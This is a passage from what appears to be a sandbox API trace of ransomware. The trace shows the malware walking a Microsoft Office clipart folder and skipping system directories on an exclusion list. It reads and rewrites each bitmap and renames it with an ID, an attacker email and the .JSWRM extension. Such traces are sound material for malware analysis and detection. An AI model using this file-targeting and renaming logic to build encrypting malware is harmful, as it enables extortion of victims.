CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0094.251] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0094.251] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0094.251] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02417U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02417u.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0094.259] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=31968) returned 1 [0094.259] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.259] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7ce0) returned 0x24d210 [0094.260] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x7ce0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x7ce0, lpOverlapped=0x0) returned 1 [0094.363] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.363] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x7ce0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x7ce0, lpOverlapped=0x0) returned 1 [0094.363] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0094.364] CloseHandle (hObject=0x314) returned 1 [0094.364] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0094.364] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0094.364] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0094.364] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0094.364] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0094.364] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0094.364] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0094.364] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0094.364] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0094.364] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0094.364] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0094.364] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0094.364] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0094.364] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0094.364] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02417U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02417u.bmp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02417U.BMP.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02417u.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0094.366] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0094.366] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0094.366] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0094.366] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10208b6e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10208b6e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1022edb4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7c08, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PH02466U.BMP", cAlternateFileName="")) returned 1 [0094.366] lstrcmpiW (lpString1="PH02466U.BMP", lpString2=".") returned 1 [0094.366] lstrcmpiW (lpString1="PH02466U.BMP", lpString2="..") returned 1 [0094.366] lstrcmpiW (lpString1="PH02466U.BMP", lpString2="...") returned 1 [0094.366] lstrcmpiW (lpString1="PH02466U.BMP", lpString2="windows") returned -1 [0094.366] lstrcmpiW (lpString1="PH02466U.BMP", lpString2="recovery") returned -1 [0094.366] lstrcmpiW (lpString1="PH02466U.BMP", lpString2="perflogs") returned 1 [0094.366] lstrcmpiW (lpString1="PH02466U.BMP", lpString2="documents and settings") returned 1 [0094.366] lstrcmpiW (lpString1="PH02466U.BMP", lpString2="$RECYCLE.BIN") returned 1 [0094.366] lstrcmpiW (lpString1="PH02466U.BMP", lpString2="system volume information") returned -1 [0094.366] lstrcmpiW (lpString1="PH02466U.BMP", lpString2="msocache") returned 1 [0094.366] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0094.366] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02466U.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.366] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02466U.BMP", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02466U.BMP", lpUsedDefaultChar=0x0) returned 12 [0094.366] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0094.366] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0094.366] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02466U.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.366] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02466U.BMP", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02466U.BMP", lpUsedDefaultChar=0x0) returned 12 [0094.366] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0094.366] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0094.366] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0094.366] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0094.366] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0094.367] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0094.367] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02466U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02466u.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0094.367] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=31752) returned 1 [0094.367] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.367] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7c00) returned 0x24d210 [0094.368] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x7c00, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x7c00, lpOverlapped=0x0) returned 1 [0094.406] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.406] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x7c00, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x7c00, lpOverlapped=0x0) returned 1 [0094.406] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0094.407] CloseHandle (hObject=0x314) returned 1 [0094.407] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0094.407] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0094.407] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0094.407] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0094.407] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0094.407] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0094.407] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0094.407] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0094.407] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0094.407] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0094.407] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0094.407] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247898 [0094.407] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0094.407] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0094.407] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02466U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02466u.bmp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02466U.BMP.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02466u.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0094.408] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247898 | out: hHeap=0x1e0000) returned 1 [0094.408] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0094.408] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0094.408] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1022edb4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1022edb4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1027b233, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x48fc, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PH02470U.BMP", cAlternateFileName="")) returned 1 [0094.409] lstrcmpiW (lpString1="PH02470U.BMP", lpString2=".") returned 1 [0094.409] lstrcmpiW (lpString1="PH02470U.BMP", lpString2="..") returned 1 [0094.409] lstrcmpiW (lpString1="PH02470U.BMP", lpString2="...") returned 1 [0094.409] lstrcmpiW (lpString1="PH02470U.BMP", lpString2="windows") returned -1 [0094.409] lstrcmpiW (lpString1="PH02470U.BMP", lpString2="recovery") returned -1 [0094.409] lstrcmpiW (lpString1="PH02470U.BMP", lpString2="perflogs") returned 1 [0094.409] lstrcmpiW (lpString1="PH02470U.BMP", lpString2="documents and settings") returned 1 [0094.409] lstrcmpiW (lpString1="PH02470U.BMP", lpString2="$RECYCLE.BIN") returned 1 [0094.409] lstrcmpiW (lpString1="PH02470U.BMP", lpString2="system volume information") returned -1 [0094.409] lstrcmpiW (lpString1="PH02470U.BMP", lpString2="msocache") returned 1 [0094.409] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0094.409] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02470U.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.409] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02470U.BMP", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02470U.BMP", lpUsedDefaultChar=0x0) returned 12 [0094.409] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0094.409] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0094.409] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02470U.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.409] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02470U.BMP", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02470U.BMP", lpUsedDefaultChar=0x0) returned 12 [0094.409] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0094.409] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0094.409] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0094.409] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0094.409] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0094.409] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0094.410] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02470U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02470u.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0094.410] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=18684) returned 1 [0094.410] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.410] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x48f0) returned 0x24d210 [0094.411] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x48f0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x48f0, lpOverlapped=0x0) returned 1 [0094.414] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.414] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x48f0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x48f0, lpOverlapped=0x0) returned 1 [0094.414] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0094.414] CloseHandle (hObject=0x314) returned 1 [0094.414] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0094.414] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0094.414] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0094.414] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0094.415] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0094.415] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0094.415] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0094.415] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0094.415] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0094.415] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0094.415] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0094.415] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0094.415] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0094.415] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0094.415] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02470U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02470u.bmp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02470U.BMP.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02470u.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0094.416] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0094.416] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0094.416] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0094.416] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1022edb4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1022edb4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1027b233, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7ce0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PH02503U.BMP", cAlternateFileName="")) returned 1 [0094.416] lstrcmpiW (lpString1="PH02503U.BMP", lpString2=".") returned 1 [0094.416] lstrcmpiW (lpString1="PH02503U.BMP", lpString2="..") returned 1 [0094.416] lstrcmpiW (lpString1="PH02503U.BMP", lpString2="...") returned 1 [0094.416] lstrcmpiW (lpString1="PH02503U.BMP", lpString2="windows") returned -1 [0094.416] lstrcmpiW (lpString1="PH02503U.BMP", lpString2="recovery") returned -1 [0094.416] lstrcmpiW (lpString1="PH02503U.BMP", lpString2="perflogs") returned 1 [0094.416] lstrcmpiW (lpString1="PH02503U.BMP", lpString2="documents and settings") returned 1 [0094.416] lstrcmpiW (lpString1="PH02503U.BMP", lpString2="$RECYCLE.BIN") returned 1 [0094.416] lstrcmpiW (lpString1="PH02503U.BMP", lpString2="system volume information") returned -1 [0094.416] lstrcmpiW (lpString1="PH02503U.BMP", lpString2="msocache") returned 1 [0094.416] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0094.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02503U.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02503U.BMP", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02503U.BMP", lpUsedDefaultChar=0x0) returned 12 [0094.416] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0094.416] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0094.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02503U.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02503U.BMP", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02503U.BMP", lpUsedDefaultChar=0x0) returned 12 [0094.416] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0094.416] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0094.416] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0094.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0094.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0094.416] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0094.416] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02503U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02503u.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0094.417] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=31968) returned 1 [0094.417] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.417] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7ce0) returned 0x24d210 [0094.418] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x7ce0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x7ce0, lpOverlapped=0x0) returned 1 [0094.422] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.423] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x7ce0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x7ce0, lpOverlapped=0x0) returned 1 [0094.423] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, 